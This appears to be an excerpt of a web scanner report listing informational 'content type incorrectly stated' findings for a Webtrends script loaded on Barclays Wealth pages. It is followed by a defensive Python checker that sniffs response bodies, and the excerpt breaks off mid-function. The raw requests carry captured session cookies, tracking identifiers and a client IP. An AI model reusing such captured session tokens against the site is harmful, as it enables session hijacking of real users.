Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=9EE5E42568221972B90415F936FA1D9A; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:31 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.60. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504096ebad4514097d6ea42a2aaa1722bfc6805023920a5cea144572e6e343d86b5428cb628720722ed8417529f7043e24af651d3065232800df809d929d406c381026ac30bf2057f84424832564b636da827f53a737cae48fbbbe7f343a9f53a45e1c472f42eeaa81b1753d9efa4be878149ec767699c605dcc25a776c1875b6ac5cd69b5d929e46a8b4d2acd3192124d25b3c9704495fd8e00d09ae35151442e17656a1754a31f2341d244709ba12cd69cc09e6b8eaa82a44a9e2c6c79f1cd33eb86eac041b89f90b084540fa130020e282ab85c86753c598e32be61a40ad115bb28fcb4cd9fc46c23f1e4b9c1de4dc5267d19ca38906d6afa60b6c335ed48259fe13cb297adf517a2aced63bcbecada3ed3a960df96629a50e58ae4c0178e7faa122406abe04d14b39d016e8e31aa84f99e4056bf4a35df87926ba4dd1a21ffd079714c50820e47d59b96dd659972566a8b031da0bb35df2617b373c19c5b4dde4ce3d69ccf6b59e8f90f2daf9b6156f1bb0cb98c78d0b4013d2173f1dd657de090d2027d750c94eaba1b0f554b23b5f05b5697157327f95360a35612ea4ec297f9766254e3715123d07c3c51ecacef5e222e1577edc72b13c16462e6befedeb66510d1111be7d80eb92aa438a4b029d892513ab41961f5aaf75ffce04cba025fc8cef680e1b66e970a5ab467d6a0d739e976c1f1d8a6dcba5f531f390f0f45e8967f71504700f2f889714595c5206e8e7491a5ad7e78b470e10e6bcb41b8301b41916d59fbb90e135577f1fe619942105793ef90cb82ecc80fa98596434f90d984edad0e5bd92722b197e67b3dd1fc9400cb7ea8654a0caf6248f87bacf297959af756d6072084056728133a669b77bfb470469769929c57142930d428d71771d3ae20022915c185680ddc652f917d0a04aa3b486f8a8280dad7ba48ff12e8423635d8cab094b976b070de61e102984f643f4fdb6ad17c406685c8a45069b2596d3a392fdc3276be3e84c1bcfce
2985a91d9122f2d85c3a3f2c4ab82b95f9f7d62dbd2a3b324d1367971b1c1d198290c0e13b3777d2cf1156886c40b883d47b346180747440a6ac8591f61c72c18126c0d7d523617b5682bd58b743da7996af1aa4f24f9711fffb97a38155f734a1c2c18adb19acdc17ee66be2cd9ca7136ed44b29c1ed843ae62e6e151e0e6354189bb7611e37d4dcaf9872fa7568551bb31337ddd8563f91a6500ac2e9d1af9accbc502a7f64a  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-Type statement: text/html;charset=UTF-8. The response states that it contains HTML, but the body is generated by js.jsp and opens with a /** ... */ comment block, which the scanner's heuristic classified as CSS; it appears to contain JavaScript rather than HTML.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A41F4D7EB85977B26917F3C61E7ED309; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=fcdcc722e932031ed775

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D04074B23F5A36B7B29BA0731F53ABEE; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.61. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6
f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2

Issue detail

The response contains the following Content-Type statement: text/html;charset=UTF-8. The response states that it contains HTML, but the body is generated by js.jsp and opens with a /** ... */ comment block, which the scanner's heuristic classified as CSS; it appears to contain JavaScript rather than HTML.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6EDFD59FF31DFFC88DA19690B7FF95B4; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e93203b7c335

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:50 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.62. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b1244870c1f77575f813e1f6f603fbaf73501f56803  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-Type statement: text/html;charset=UTF-8. The response states that it contains HTML, but the body is generated by js.jsp and opens with a /** ... */ comment block, which the scanner's heuristic classified as CSS; it appears to contain JavaScript rather than HTML.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D8093C1321BCE6A1782156CDD8E84722; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.63. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-Type statement: text/html;charset=UTF-8. The response states that it contains HTML, but the body is generated by js.jsp and opens with a /** ... */ comment block, which the scanner's heuristic classified as CSS; it appears to contain JavaScript rather than HTML.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DD03FBD6C5716741DEF4FC9264E5B178; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e93202cf02d7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1DB1B8506FA734F3D0691621AC32919E; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.64. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-Type statement: text/html;charset=UTF-8. The response states that it contains HTML, but the body is generated by js.jsp and opens with a /** ... */ comment block, which the scanner's heuristic classified as CSS; it appears to contain JavaScript rather than HTML.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7
882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e932033a5f6d; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=03955303B3331E793004A3981BAFE30B; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

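The webtrends findings above all record the same observation: js.jsp output served with Content-Type text/html, and a scanner verdict of "CSS" that rests on nothing more than the leading /** ... */ comment, since that is all that survives before [SNIP]. The following Python is an added example, not part of the XSS.CX report or of Burp Suite. It re-implements the check offline and goes a step further than the single case on the page: it parses a raw response, maps the declared MIME type to a body family (assumed mapping in MIME_FAMILY), strips leading comments before sniffing (they are legal in both CSS and JavaScript, so they carry no signal), distinguishes HTML, JSON, JavaScript and CSS, treats an unterminated comment as "unknown" rather than guessing, and reports whether X-Content-Type-Options: nosniff is present. The header block is copied from finding 28.57; the script body after the comment header and the helper make_response are constructed, because the page only shows the comment header.

```python
"""Offline re-check of a "content type incorrectly stated" finding.

Added example, not the report's or Burp Suite's code. Declared type comes from
the Content-Type header; the body family is sniffed after dropping leading
comments, so a comment-only (truncated) body yields "unknown", not "css".
"""
import re

# Assumed mapping of declared MIME types to the body families sniffed below.
MIME_FAMILY = {
    "text/html": "html",
    "text/css": "css",
    "text/javascript": "javascript",
    "application/javascript": "javascript",
    "application/x-javascript": "javascript",
    "application/json": "json",
}

LEADING_COMMENT = re.compile(r"\s*(?:/\*.*?\*/|//[^\n]*)", re.S)
HTML_START = re.compile(r"^<(?:!doctype|html|head|body|meta|title|script|div|!--)", re.I)
JS_START = re.compile(
    r"^(?:(?:var|let|const|function|if|return|window|document)\b"
    r"|\(function|!function|[A-Za-z_$][\w$.]*\s*[=(;])"
)
CSS_START = re.compile(r"^(?:@(?:charset|import|media|font-face)\b|[.#*]?[A-Za-z_-][\w\s,.#:>\[\]-]*\{)")

# Headers copied from finding 28.57 above (no X-Content-Type-Options is sent).
REPORT_HEADERS = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "Content-Length: 45071\r\n"
    "\r\n"
)
TRUNCATED_BODY = (  # exactly the body prefix visible before [SNIP]: an unterminated comment
    "/**\n"
    " * Copyright 2005-2009 webtrends All Rights Reserved.\n"
    " * WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.\n"
    " *\n"
    " * $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae"
)
SAMPLE_BODY = (  # constructed stand-in for the full js.jsp output; not on the page
    "/**\n * constructed stand-in for the snipped script\n */\n"
    "var WT_OTS = WT_OTS || {};\n"
    "WT_OTS.init = function () { return true; };\n"
)
SAMPLE_RESPONSE = REPORT_HEADERS + SAMPLE_BODY


def make_response(content_type, body, nosniff=False):
    """Build a minimal raw response for local experiments (constructed helper)."""
    lines = ["HTTP/1.1 200 OK", "Content-Type: " + content_type]
    if nosniff:
        lines.append("X-Content-Type-Options: nosniff")
    return "\r\n".join(lines) + "\r\n\r\n" + body


def parse_response(raw):
    """Split a raw response into a lower-cased header dict and the body."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        head, _, body = raw.partition("\n\n")
    headers = {}
    for line in head.splitlines()[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def strip_leading_comments(body):
    """Drop leading whitespace and complete /* */ or // comments. An unterminated
    comment (the [SNIP]-truncated case) stays, so no family pattern matches it."""
    while True:
        m = LEADING_COMMENT.match(body)
        if not m:
            return body.lstrip()
        body = body[m.end():]


def sniff_body(body):
    """Heuristic body classification: html, json, javascript, css or unknown."""
    text = strip_leading_comments(body)
    if not text:
        return "unknown"
    if HTML_START.match(text):
        return "html"
    if text[0] in "[{":
        return "json"
    if JS_START.match(text):
        return "javascript"
    if CSS_START.match(text):
        return "css"
    return "unknown"


def check_content_type(raw):
    """Compare declared and sniffed body family and report nosniff presence."""
    headers, body = parse_response(raw)
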